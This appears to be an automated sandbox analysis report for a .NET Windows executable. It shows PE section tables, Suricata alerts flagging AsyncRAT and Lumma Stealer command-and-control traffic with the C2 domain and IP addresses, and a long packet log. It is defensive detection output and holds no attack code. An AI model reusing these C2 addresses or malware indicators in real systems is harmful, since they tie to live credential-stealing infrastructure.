                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x577200x4b.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x580000x570.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x5a0000xc.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x20000x557740x55800c5f9b0488bda4f24e0c6647e53096523False0.9210811860380117data7.870067595402444IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rsrc0x580000x5700x6005e140f816c57303cc06cf5cef939c94aFalse0.4029947916666667data3.9524248753127935IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x5a0000xc0x200fe1f3ca06406d93cb76967f9a880369aFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_VERSION0x580a00x2e4data0.4283783783783784
                                RT_MANIFEST0x583840x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                DLLImport
                                mscoree.dll_CorExeMain
                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-09-19T02:25:10.674873+02002035595ET MALWARE Generic AsyncRAT Style SSL Cert145.11.229.9656001192.168.2.449730TCP
                                2024-09-19T02:26:03.587476+02002055879ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eemmbryequo .shop)1192.168.2.4587271.1.1.153UDP
                                2024-09-19T02:26:04.110751+02002055880ET MALWARE Observed Win32/Lumma Stealer Related Domain (eemmbryequo .shop in TLS SNI)1192.168.2.449740104.21.39.11443TCP
                                2024-09-19T02:26:04.279785+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449740104.21.39.11443TCP
                                2024-09-19T02:26:04.279785+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449740104.21.39.11443TCP
                                2024-09-19T02:26:04.836051+02002055880ET MALWARE Observed Win32/Lumma Stealer Related Domain (eemmbryequo .shop in TLS SNI)1192.168.2.449741104.21.39.11443TCP
                                2024-09-19T02:26:05.278564+02002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449741104.21.39.11443TCP
                                2024-09-19T02:26:05.278564+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449741104.21.39.11443TCP
                                TimestampSource PortDest PortSource IPDest IP
                                Sep 19, 2024 02:25:10.026518106 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:10.031326056 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:10.031411886 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:10.033777952 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:10.038647890 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:10.054827929 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:10.059705973 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:10.663592100 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:10.663615942 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:10.663793087 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:10.669996977 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:10.674873114 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:11.729355097 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:11.729778051 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:11.729837894 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:11.729940891 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:11.729984045 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:11.730355024 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:11.730396032 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:12.979893923 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:12.984822035 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:12.984992981 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:12.989799023 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:40.764921904 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:40.769972086 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:40.770050049 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:40.774894953 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:41.099205017 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:41.154472113 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:41.232032061 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:41.238385916 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:41.243835926 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:41.243921995 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:41.249034882 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:46.720941067 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:46.764108896 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:46.855787039 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:46.860516071 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:46.865297079 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:46.865361929 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:46.870242119 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.222814083 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.222918034 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.222976923 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.222985029 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.223131895 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.223166943 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.223191023 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.223221064 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.223253965 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.223278046 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.223289013 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.223341942 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.223922014 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.223954916 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.223989964 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.223999977 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.224385023 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.224417925 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.224432945 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.224452019 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.224483967 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.224495888 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.224519968 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.224562883 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.311805964 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.311876059 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.311918974 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.311933994 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.311953068 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.311990976 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.312001944 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.312022924 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.312056065 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.312067032 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.312088013 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.312105894 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.312129974 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.312144041 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.312189102 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.312607050 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.312639952 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.312674046 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.312683105 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.312707901 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.312756062 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.313127995 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.313179016 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.313222885 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.313227892 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.313261986 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.313294888 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.313306093 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.313328028 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.313369036 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.314188004 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.314219952 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.314253092 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.314280033 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.314281940 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.314322948 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.399847031 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.399878025 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.399930000 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.399977922 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.400001049 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.400011063 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.400043964 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.400077105 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.400078058 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.400109053 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.400141954 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.400173903 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.400671959 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.400705099 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.400728941 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.400738001 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.400769949 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.400785923 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.400801897 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.400861979 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.401061058 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.401113987 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.401163101 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.401175022 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.401196957 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.401227951 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.401246071 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.401262999 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.401316881 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.401748896 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.401798010 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.401829958 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.401840925 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.401863098 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.401896000 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.401905060 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.401935101 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.401968002 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.401983976 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.402000904 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.402096033 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.402621984 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.402673960 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.402723074 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.402724981 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.402757883 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.402790070 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.402808905 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.402821064 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.402853012 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.402872086 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.402884960 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.402929068 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.403599024 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.403630972 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.403664112 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.403677940 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.403696060 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.403748035 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.507472992 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.507561922 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.507596016 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.507612944 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.507630110 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.507675886 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.507680893 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.507714987 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.507746935 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.507757902 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.507780075 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.507822037 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.507836103 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.507869959 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.507901907 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.507917881 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.507936001 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.507966995 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.507977009 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.507999897 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.508030891 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.508043051 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.508063078 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.508095980 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.508105040 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.508128881 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.508176088 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.508178949 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.508210897 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.508241892 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.508255959 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.508274078 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.508312941 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.508320093 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.508359909 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.508390903 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.508398056 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.508423090 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.508454084 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.508466959 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.508486986 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.508519888 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.508531094 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.508550882 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.508582115 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.508600950 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.508614063 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.508646011 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.508661985 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.508677006 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.508708954 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.508728981 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.508742094 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.508774042 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.508784056 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.508805990 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.508836985 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.508852005 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.508868933 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.508899927 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.508912086 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.508932114 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.508963108 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.508980989 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.508994102 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.509025097 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.509035110 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.509057045 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.509088993 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.509099007 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.509121895 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.509152889 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.509170055 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.509185076 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.509216070 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.509228945 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.509248018 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.509279013 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.509293079 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.509310961 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.509341002 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.509358883 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.509372950 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.509404898 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.509418011 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.509437084 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.509468079 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.509480953 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.509500027 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.509531021 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.509541988 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.509562969 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.509593964 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.509604931 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.509629965 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.509658098 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.509670019 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.560816050 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.581978083 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.582047939 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.582077980 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.582129002 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.582149982 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.582163095 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.582175970 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.582195997 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.582230091 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.582243919 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.582401991 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.582434893 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.582452059 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.582467079 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.582499981 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.582505941 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.582639933 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.582693100 CEST4973056001192.168.2.445.11.229.96
                                Sep 19, 2024 02:25:47.582741976 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.582775116 CEST560014973045.11.229.96192.168.2.4
                                Sep 19, 2024 02:25:47.582806110 CEST560014973045.11.229.96192.168.2.4
